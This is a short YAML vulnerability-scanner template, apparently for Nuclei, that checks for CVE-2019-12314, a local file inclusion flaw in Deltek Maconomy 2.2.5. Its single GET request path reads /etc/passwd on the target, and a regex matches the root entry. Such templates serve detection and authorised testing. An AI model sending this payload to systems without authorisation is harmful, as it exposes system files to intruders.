20 lines
362 B
YAML
20 lines
362 B
YAML
|
id: CVE-2019-12314
|
||
|
|
||
|
info:
|
||
|
name: Deltek Maconomy 2.2.5 LFIl
|
||
|
author: madrobot
|
||
|
severity: high
|
||
|
|
||
|
requests:
|
||
|
- method: GET
|
||
|
path:
|
||
|
- "{{BaseURL}}/cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//etc/passwd"
|
||
|
matchers:
|
||
|
- type: status
|
||
|
status:
|
||
|
- 200
|
||
|
- type: regex
|
||
|
regex:
|
||
|
- "root:[x*]:0:0:"
|
||
|
part: body
|